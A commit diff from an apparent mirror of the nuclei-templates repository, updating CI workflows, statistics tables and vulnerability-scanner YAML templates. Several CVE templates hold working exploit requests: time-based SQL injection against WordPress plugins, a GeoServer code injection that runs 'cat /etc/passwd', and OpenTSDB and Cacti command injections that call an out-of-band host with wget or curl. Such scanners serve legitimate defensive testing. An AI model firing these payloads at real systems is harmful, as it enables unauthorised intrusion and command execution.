daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'main' into master

patch-1
Dhiyaneshwaran 2023-01-09 21:13:29 +05:30 committed by GitHub
parent 509b5605eb 3adcdb39c1
commit 5dd40c8bf8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
86 changed files with 3482 additions and 2418 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.github/workflows/cve-annotate.yml vendored
View File

@ -3,7 +3,7 @@ name: ✍🏻 CVE Annotate
on:
push:
branches:
- master
- main
workflow_dispatch:
jobs:

2
.github/workflows/new-templates.yml vendored
View File

@ -3,7 +3,7 @@ name: 🥳 New Template List
on:
push:
branches:
- master
- main
workflow_dispatch:
jobs:

4
.github/workflows/syntax-checking.yml vendored
View File

@ -1,6 +1,8 @@
name: ❄️ YAML Lint
on: [push, pull_request]
on:
pull_request:
workflow_dispatch:
jobs:
build:

2
.github/workflows/template-db-indexer.yml vendored
View File

@ -3,7 +3,7 @@ name: 📑 Template-DB Indexer
on:
push:
branches:
- master
- main
workflow_dispatch:
jobs:

3
.github/workflows/template-validate.yml vendored
View File

@ -1,6 +1,7 @@
name: 🛠 Template Validate
on: [ push, pull_request ]
on:
pull_request:
jobs:
build:

7
.github/workflows/templates-stats.yml vendored
View File

@ -10,7 +10,9 @@ jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- uses: actions/checkout@v3
with:
fetch-depth: 0
- uses: actions/setup-go@v2
with:
go-version: 1.18
@ -51,5 +53,4 @@ jobs:
- name: Push changes
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: master
github_token: ${{ secrets.GITHUB_TOKEN }}

2
.github/workflows/wordpress-plugins-update.yml vendored
View File

@ -1,8 +1,10 @@
name: ✨ WordPress Plugins - Update
on:
schedule:
- cron: "0 4 * * *" # every day at 4am UTC
workflow_dispatch:
jobs:
Update:
runs-on: ubuntu-latest

6
.new-additions
View File

@ -0,0 +1,6 @@
exposed-panels/episerver-panel.yaml
exposed-panels/freepbx-administration-panel.yaml
exposures/mobiproxy-dashboard.yaml
misconfiguration/installer/impresspages-installer.yaml
misconfiguration/installer/monstra-installer.yaml
misconfiguration/installer/orangehrm-installer.yaml

26
README.md
View File

@ -40,20 +40,20 @@ An overview of the nuclei template project, including statistics on unique tags,
## Nuclei Templates Top 10 statistics
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 |
| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 |
| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 |
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | |
| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | |
| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | |
| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | |
| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | |
| tech | 360 | princechaddha | 153 | file | 78 | | | | |
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1575 | dhiyaneshdk | 708 | cves | 1552 | info | 1919 | http | 4631 |
| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1170 | network | 84 |
| wordpress | 684 | pikpikcu | 344 | technologies | 529 | medium | 849 | file | 78 |
| edb | 583 | pdteam | 273 | vulnerabilities | 528 | critical | 568 | dns | 17 |
| wp-plugin | 579 | geeknik | 220 | misconfiguration | 372 | low | 294 | | |
| exposure | 573 | ricardomaia | 210 | exposures | 325 | unknown | 26 | | |
| tech | 567 | pussycat0x | 181 | token-spray | 237 | | | | |
| xss | 549 | dwisiswant0 | 171 | workflows | 190 | | | | |
| lfi | 522 | 0x_akoko | 171 | default-logins | 122 | | | | |
| cve2021 | 375 | ritikchaddha | 167 | file | 78 | | | | |
**335 directories, 5229 files**.
**336 directories, 5244 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

4636
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

24
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 |
| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 |
| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 |
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | |
| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | |
| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | |
| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | |
| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | |
| tech | 360 | princechaddha | 153 | file | 78 | | | | |
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1575 | dhiyaneshdk | 708 | cves | 1552 | info | 1919 | http | 4631 |
| panel | 803 | daffainfo | 662 | exposed-panels | 805 | high | 1170 | network | 84 |
| wordpress | 684 | pikpikcu | 344 | technologies | 529 | medium | 849 | file | 78 |
| edb | 583 | pdteam | 273 | vulnerabilities | 528 | critical | 568 | dns | 17 |
| wp-plugin | 579 | geeknik | 220 | misconfiguration | 372 | low | 294 | | |
| exposure | 573 | ricardomaia | 210 | exposures | 325 | unknown | 26 | | |
| tech | 567 | pussycat0x | 181 | token-spray | 237 | | | | |
| xss | 549 | dwisiswant0 | 171 | workflows | 190 | | | | |
| lfi | 522 | 0x_akoko | 171 | default-logins | 122 | | | | |
| cve2021 | 375 | ritikchaddha | 167 | file | 78 | | | | |

1
cves/2020/CVE-2020-11110.yaml
View File

@ -21,6 +21,7 @@ info:
shodan-query: title:"Grafana"
tags: cve,cve2020,xss,grafana,hackerone
requests:
- raw:
- |

20
cves/2020/CVE-2020-35476.yaml
View File

@ -4,7 +4,8 @@ info:
name: OpenTSDB <= 2.4.0 - Remote Code Execution
author: pikpikcu
severity: critical
description: OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory.
description: |
OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory.
reference:
- https://github.com/OpenTSDB/opentsdb/issues/2051
- https://nvd.nist.gov/vuln/detail/CVE-2020-35476
@ -14,29 +15,32 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-35476
cwe-id: CWE-78
metadata:
verified: true
shodan-query: html:"OpenTSDB"
tags: cve,cve2020,opentsdb,rce,packetstorm
requests:
- method: GET
path:
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://interact.sh%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- plotted
- timing
- cachehit
part: body
condition: and
- type: word
part: header
words:
- application/json
part: header
# Enhanced by mp on 2022/04/28
- type: status
status:
- 200

36
cves/2021/CVE-2021-24946.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2021-24946
info:
name: Modern Events Calendar < 6.1.5 - Blind SQL Injection
author: theamanrawat
severity: critical
description: |
The plugin does not sanitise and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action, available to unauthenticated users, leading to an unauthenticated SQL injection issue.
reference:
- https://wpscan.com/vulnerability/09871847-1d6a-4dfe-8a8c-f2f53ff87445
- https://wordpress.org/plugins/modern-events-calendar-lite/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24946
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24946
cwe-id: CWE-89
metadata:
verified: "true"
tags: wordpress,wp-plugin,wp,unauth,wpscan,cve,cve2021,sqli,modern-events-calendar-lite
requests:
- raw:
- |
@timeout: 10s
GET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200 || status_code == 500'
- 'contains(content_type, "text/html")'
- 'contains(body, "The event is finished") || contains(body, "been a critical error")'
condition: and

2
cves/2021/CVE-2021-25099.yaml
View File

@ -17,7 +17,7 @@ info:
cwe-id: CWE-79
metadata:
verified: "true"
tags: wp-plugin,wp,unauth,cve,cve2021,wordpress,xss,give,wpscan
tags: wp-plugin,wp,give,unauth,wordpress,cve2021,xss,wpscan,cve
requests:
- raw:

26
cves/2021/CVE-2021-28151.yaml
View File

@ -39,21 +39,17 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
- type: word
part: header
words:
- "text/html"
- "application/x-www-form-urlencoded"
condition: or
- type: status
status:
- 200
- type: word
words:
- "text/html"
part: header
- type: word
words:
- "uid="
- "gid="
- "groups="
part: body
condition: and
# Enhanced by mp on 2022/07/15

39
cves/2022/CVE-2022-0784.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2022-0784
info:
name: Title Experiments Free < 9.0.1 - Unauthenticated SQLi
author: theamanrawat
severity: critical
description: |
The Title Experiments Free WordPress plugin before 9.0.1 does not sanitise and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection.
reference:
- https://wpscan.com/vulnerability/6672b59f-14bc-4a22-9e0b-fcab4e01d97f
- https://wordpress.org/plugins/wp-experiments-free/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0784
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0784
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,cve2022,wordpress
requests:
- raw:
- |
@timeout: 10s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "{\"images\":")'
condition: and

2
cves/2022/CVE-2022-0786.yaml
View File

@ -17,7 +17,7 @@ info:
cwe-id: CWE-89
metadata:
verified: "true"
tags: kivicare-clinic-management-system,unauth,wp,sqli,wordpress,wp-plugin,wpscan,cve,cve2022
tags: sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,cve,cve2022,wpscan
requests:
- raw:

2
cves/2022/CVE-2022-1595.yaml
View File

@ -17,7 +17,7 @@ info:
cwe-id: CWE-200
metadata:
verified: "true"
tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url,unauth
tags: unauth,wpscan,cve,cve2022,wordpress,wp-plugin,wp,hc-custom-wp-admin-url
requests:
- raw:

2
cves/2022/CVE-2022-2314.yaml
View File

@ -16,7 +16,7 @@ info:
cve-id: CVE-2022-2314
metadata:
verified: "true"
tags: rce,unauth,wordpress,wp-plugin,wp,vr-calendar-sync,wpscan,cve,cve2022
tags: rce,unauth,wpscan,cve,cve2022,wp,vr-calendar-sync,wordpress,wp-plugin
requests:
- raw:

73
cves/2022/CVE-2022-24816.yaml Normal file
View File

@ -0,0 +1,73 @@
id: CVE-2022-24816
info:
name: Geoserver Server - Code Injection
author: mukundbhuva
severity: critical
description: |
Programs using jt-jiffle, and allowing Jiffle script to be provided via network request, are susceptible to a Remote Code Execution as the Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects the downstream GeoServer project Version < 1.1.22.
reference:
- https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-24816
- https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx
- https://github.com/geosolutions-it/jai-ext/commit/cb1d6565d38954676b0a366da4f965fef38da1cb
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-24816
cwe-id: CWE-94
metadata:
fofa-query: app="GeoServer"
shodan-query: /geoserver/
verified: "true"
tags: cve,cve2022,geoserver,rce
requests:
- raw:
- |
POST /geoserver/wms HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<wps:Execute version="1.0.0" service="WPS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.opengis.net/wps/1.0.0" xmlns:wfs="http://www.opengis.net/wfs" xmlns:wps="http://www.opengis.net/wps/1.0.0" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:gml="http://www.opengis.net/gml" xmlns:ogc="http://www.opengis.net/ogc" xmlns:wcs="http://www.opengis.net/wcs/1.1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
<ows:Identifier>ras:Jiffle</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>coverage</ows:Identifier>
<wps:Data>
<wps:ComplexData mimeType="application/arcgrid"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999 316]]></wps:ComplexData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>script</ows:Identifier>
<wps:Data>
<wps:LiteralData>dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cat /etc/passwd").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>outputType</ows:Identifier>
<wps:Data>
<wps:LiteralData>DOUBLE</wps:LiteralData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput mimeType="image/tiff">
<ows:Identifier>result</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "ExceptionInInitializerError"
condition: and
- type: status
status:
- 200

3
cves/2022/CVE-2022-33891.yaml
View File

@ -17,8 +17,9 @@ info:
cwe-id: CWE-77
metadata:
shodan-query: title:"Spark Master at"
cve-id: CVE-2022-33891
verified: "true"
tags: spark,authenticated,packetstorm,cve,cve2022,apache
tags: packetstorm,cve,cve2022,apache,spark,authenticated
variables:
command: "echo CVE-2022-33891 | rev"

2
cves/2022/CVE-2022-3768.yaml
View File

@ -19,7 +19,7 @@ info:
cwe-id: CWE-89
metadata:
verified: "true"
tags: wp-plugin,wp,wp-smart-contracts,authenticated,wpscan,cve,cve2022,wordpress,sqli
tags: wp-smart-contracts,authenticated,cve,wordpress,wp,sqli,cve2022,wp-plugin,wpscan
requests:
- raw:

2
cves/2022/CVE-2022-4050.yaml
View File

@ -17,7 +17,7 @@ info:
cwe-id: CWE-89
metadata:
verified: "true"
tags: wpscan,cve,cve2022,sqli,joomsport-sports-league-results-management,wordpress,wp-plugin,wp,unauth
tags: wpscan,cve,cve2022,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth
requests:
- raw:

2
cves/2022/CVE-2022-4260.yaml
View File

@ -16,7 +16,7 @@ info:
cwe-id: CWE-79
metadata:
verified: "true"
tags: xss,wp-ban,wpscan,cve,cve2022,wordpress,wp-plugin,wp,authenticated
tags: wp-plugin,xss,wp-ban,authenticated,wpscan,cve,cve2022,wordpress,wp
requests:
- raw:

2
cves/2022/CVE-2022-45917.yaml
View File

@ -19,7 +19,7 @@ info:
metadata:
shodan-query: http.html:"ILIAS"
verified: "true"
tags: packetstorm,seclists,cve,cve2022,ilias,redirect
tags: redirect,packetstorm,seclists,cve,cve2022,ilias
requests:
- method: GET

48
cves/2022/CVE-2022-46169.yaml Normal file
View File

@ -0,0 +1,48 @@
id: CVE-2022-46169
info:
name: Cacti <= 1.2.22 Unauthenticated Command Injection
author: Hardik-Solanki
severity: critical
description: |
The vulnerability allows a remote attacker to compromise the affected system. The vulnerability exists due to insufficient authorization within the Remote Agent when handling HTTP requests with a custom Forwarded-For HTTP header. A remote non-authenticated attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server.
reference:
- https://security-tracker.debian.org/tracker/CVE-2022-46169
- https://nvd.nist.gov/vuln/detail/CVE-2022-46169
- https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf
- https://www.cybersecurity-help.cz/vdb/SB2022121926
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-46169
cwe-id: CWE-285
metadata:
shodan-query: title:"Login to Cacti"
verified: "true"
tags: cve2022,cve,auth-bypass,cacti
requests:
- raw:
- |
GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}/`whoami`; HTTP/1.1
Host: {{Hostname}}
X-Forwarded-For: 127.0.0.1
unsafe: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"value":'
- '"local_data_id":'
condition: and
- type: word
part: interactsh_protocol
words:
- "http"
- type: status
status:
- 200

9
exposed-panels/aircube-dashboard-panel.yaml
View File

@ -1,9 +1,14 @@
id: aircube-dashboard-panel
info:
name: AirCube Dashboard Panel
name: airCube Dashboard Login Panel - Detect
author: theamanrawat
severity: info
description: airCube Dashboard login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"AirCube Dashboard"
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

9
exposed-panels/content-central-login.yaml
View File

@ -1,9 +1,14 @@
id: content-central-login
info:
name: Content Central Login Panel
name: Content Central Login Panel - Detect
author: theabhinavgaur
severity: info
description: Content Central login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"Content Central Login"
@ -25,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

9
exposed-panels/creatio-login-panel.yaml
View File

@ -1,9 +1,14 @@
id: creatio-login-panel
info:
name: Creatio Login Panel
name: Creatio Login Panel - Detect
author: theamanrawat
severity: info
description: Creatio login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"Creatio"
@ -27,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

9
exposed-panels/dqs-superadmin-panel.yaml
View File

@ -1,9 +1,14 @@
id: dqs-superadmin-panel
info:
name: DQS Superadmin Login Panel
name: DQS Superadmin Login Panel - Detect
author: Hardik-Solanki
severity: info
description: DQS Superadmin login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"DQS Superadmin"
@ -23,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

28
exposed-panels/episerver-panel.yaml Normal file
View File

@ -0,0 +1,28 @@
id: episerver-panel
info:
name: Episerver Login Panel
author: William Söderberg @ WithSecure
severity: info
description: Optimizely CMS was detected. Optimizely CMS was formerly known as Episerver.
reference:
- https://docs.developers.optimizely.com/content-cloud/v12.0.0-content-cloud/docs/changing-edit-and-admin-view-urls
metadata:
verified: true
shodan-query: html:"epihash"
tags: panel,optimizely,episerver
requests:
- method: GET
path:
- "{{BaseURL}}/episerver/cms"
matchers-condition: and
matchers:
- type: regex
regex:
- "Util.*%2fepiserver%2fcms"
- type: status
status:
- 302

9
exposed-panels/flahscookie-superadmin-panel.yaml
View File

@ -1,9 +1,14 @@
id: flahscookie-superadmin-panel
info:
name: Flahscookie Superadmin Login
name: Flahscookie Superadmin Login Panel - Detect
author: Hardik-Solanki
severity: info
description: Flahscookie Superadmin login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Flahscookie Superadmin"
@ -23,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

34
exposed-panels/freepbx-administration-panel.yaml Normal file
View File

@ -0,0 +1,34 @@
id: freepbx-administration-panel
info:
name: FreePBX Administration Panel
author: tess
severity: info
metadata:
verified: "true"
shodan-dork: http.title:"FreePBX Administration"
tags: freepbx,panel
requests:
- method: GET
path:
- '{{BaseURL}}/admin/config.php#'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'FreePBX Administration'
- 'Operator Panel'
- 'User Control Panel'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

9
exposed-panels/gyra-master-admin.yaml
View File

@ -1,9 +1,14 @@
id: gyra-master-admin
info:
name: GYRA Master Admin
name: GYRA Master Admin Login Panel - Detect
author: Hardik-Solanki
severity: info
description: GYRA Master Admin login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Login | GYRA Master Admin"
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

9
exposed-panels/ilias-panel.yaml
View File

@ -1,9 +1,14 @@
id: ilias-panel
info:
name: ILIAS Panel
name: ILIAS Login Panel - Detect
author: arafatansari
severity: info
description: ILIAS login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.html:"ILIAS"
@ -28,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

9
exposed-panels/jcms-panel.yaml
View File

@ -1,11 +1,16 @@
id: jalios-jcms-panel
info:
name: Jalios JCMS Panel
name: Jalios JCMS Login Panel - Detect
author: righettod
severity: info
description: Jalios JCMS login panel was detected.
reference:
- https://www.jalios.com/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: html:"Jalios JCMS"
@ -30,3 +35,5 @@ requests:
- "JCMS_login"
- "/jcms/"
condition: or
# Enhanced by md on 2023/01/03

30
exposed-panels/lenovo-fp-panel.yaml Normal file
View File

@ -0,0 +1,30 @@
id: lenovo-fp-panel
info:
name: Lenovo Fan and Power Controller Panel
author: megamansec
severity: info
metadata:
verified: true
shodan-query: http.html:"Avocent Corporation and its affiliates"
tags: panel,lenovo
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/login.html"
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Avocent Corporation and its affiliates"
- type: status
status:
- 200

9
exposed-panels/loxone-panel.yaml
View File

@ -1,9 +1,14 @@
id: loxone-panel
info:
name: Loxone Intercom Video Login
name: Loxone Intercom Video Panel - Detect
author: theabhinavgaur
severity: info
description: Loxone Intercom Video panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"Loxone Intercom Video"
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

9
exposed-panels/mag-dashboard-panel.yaml
View File

@ -1,9 +1,14 @@
id: mag-dashboard-panel
info:
name: MAG Dashboard Panel
name: MAG Dashboard Login Panel - Detect
author: theamanrawat
severity: info
description: MAG Dashboard login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"MAG Dashboard Login"
@ -28,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

9
exposed-panels/microfocus-admin-server.yaml
View File

@ -1,9 +1,14 @@
id: microfocus-admin-server
info:
name: Micro Focus Enterprise Server Administration
name: Micro Focus Enterprise Server Admin Panel - Detect
author: theabhinavgaur
severity: medium
description: Micro Focus Enterprise Server Admin panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: "Micro Focus DSD"
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

5
exposed-panels/mikrotik/mikrotik-routeros.yaml
View File

@ -1,8 +1,7 @@
id: mikrotik-routeros
info:
name: MikroTik Router OS - Login Panel Detect
name: MikroTik Router OS Login Panel - Detect
author: gy741
severity: info
description: MikroTik Router OS login panel was detected.
@ -59,3 +58,5 @@ requests:
- '<div class="top">mikrotik routeros (.[0-9.]+) configuration page</div>'
- 'routeros (.[0-9.]+) '
- '<b>MikroTik RouterOS (.[0-9.]+)</b>'
# Enhanced by md on 2023/01/03

25
exposed-panels/mpftvc-admin-panel.yaml Normal file
View File

@ -0,0 +1,25 @@
id: mpftvc-admin-panel
info:
name: MPFTVC Admin Login Panel
author: Hardik-Solanki
severity: info
metadata:
verified: true
shodan-query: title:"AdminLogin - MPFTVC"
tags: panel,mpftvc,admin
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- "AdminLogin - MPFTVC"
- type: status
status:
- 200

9
exposed-panels/ncentral-panel.yaml
View File

@ -1,9 +1,14 @@
id: ncentral-panel
info:
name: N-central Login Panel
name: N-central Login Panel - Detect
author: theabhinavgaur
severity: info
description: N-central login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"N-central Login"
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

9
exposed-panels/netris-dashboard-panel.yaml
View File

@ -1,9 +1,14 @@
id: netris-dashboard-panel
info:
name: Netris Dashboard Panel
name: Netris Dashboard Panel - Detect
author: theamanrawat
severity: info
description: Netris Dashboard panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"Netris Dashboard"
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2023/01/03

32
exposed-panels/netsparker-panel.yaml Normal file
View File

@ -0,0 +1,32 @@
id: netsparker-panel
info:
name: Netsparker Panel
author: pussycat0x
severity: info
description: |
Netsparker is a fully configurable Enterprise Dynamic Application Security Testing (DAST) tool. A DAST tool communicates with a web application using the web front-end in order to identify potential security vulnerabilities in the web application.
reference:
- https://www.invicti.com/
metadata:
verified: true
shodan-query: http.title:"Sign in to Netsparker Enterprise"
tags: panel,netsparker
requests:
- method: GET
path:
- "{{BaseURL}}/account/signin?ReturnUrl=%2f"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Netsparker Ltd"
- "Netsparker Enterprise"
condition: and
- type: status
status:
- 200

10
exposed-panels/opencart-panel.yaml
View File

@ -1,13 +1,17 @@
id: opencart-panel
info:
name: OpenCart Login Panel
name: OpenCart Login Panel - Detect
author: ricardomaia
severity: info
description: |
